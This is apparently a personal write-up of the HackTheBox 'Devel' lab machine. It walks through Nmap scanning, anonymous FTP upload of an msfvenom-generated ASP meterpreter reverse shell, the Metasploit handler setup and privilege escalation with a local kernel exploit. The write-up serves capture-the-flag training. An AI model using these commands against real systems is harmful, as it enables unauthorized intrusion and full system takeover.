Devel


HackTheBox

Devel Challenge HackTheBox

Step 1 - Recon

When testing, almost always, my initial scanning includes Nmap, Nikto and Dirbuster. Starting with Nmap we have:

 nmap -sS -A -T4 --top-ports 500 10.10.10.5

 Nmap scan report for 10.10.10.5
 Host is up (0.052s latency).
 Not shown: 998 filtered ports
 PORT STATE SERVICE VERSION
 21/tcp open ftp Microsoft ftpd
 80/tcp open http Microsoft IIS httpd 7.5
 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

In parallel I fired nikto and dirbuster but nothing important came up. Based on the nmap results, port 21 (FTP) and 80 (Microsoft IIS) are open. It isn't so common to see the ftp port open, so let's try and access it. Apparently you can access the server files using ftp via anonymous login.



Step 2 - Exploit

Awesome, we can now pass a .asp shell using msfvenom [1].

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=ipaddress LPORT=port -f asp > shell.asp

Then pass it, using FTP, to the server.

 ftp 10.10.10.5
 ftp> put shell.asp

Final step fire msfconsole and setup the handler:

 msf> use exploit/multi/handler
 msf> set payload windows/meterpreter/reverse_tcp
 msf> set LHOST ipaddress
 msf> set LPORT port
 msf> exploit -j

Then access http://10.10.10.5/shell.asp and wait for the connection to take place.

...Nothing...

Apparently my shell was not working. At the time that was a bit weird, but in order to see what's going on, a friend of mine suggested building a Windows 7 VM with IIS to see what's wrong [2]. I tried to set it up with the same permissions I had in the box and then checked the shell.asp code. Allowing errors to show in IIS helped me identify that in line 60 (see Image below) my shellcode tried to create a file in a location that the user could not write, so we need to modify that.

As a result, I changed it to C:\inetpub\wwwroot\file.exe where I was sure I could write.

Tried again and boom we have a working shell.

Now since we are looking for a quick win here, we run getsystem [3], but we get an Operation Failed: Access is Denied. However, we can then run a pretty neat metasploit post-exploitation script called local_exploit_suggester

The best technique you could use now is trial and error, until you find a working exploit. If all of them fail, then there are other techniques that we could use (Powershell, etc - Maybe in another writeup). Here, it is a bit easier because the ms13_053_schlamperei exploit works.



Lessons learned

I believe that these type of boxes, that are easy to pwn, are also able to teach someone a few important lessons. One of them is the fact that you should never rely 100% on the tools you are using and if you are stuck, always try to simulate the situation you are in, in order to understand what's going wrong. The last thing to take away from this writeup is that metasploit is an amazing framework with loads of exploits and post-exploitation techniques.

References

[1] Msfvenom - Exploit Development
[2] Running IE Virtual Machines from Microsoft under Linux via VirtualBox
[3] Getsystem and Privilege Escalation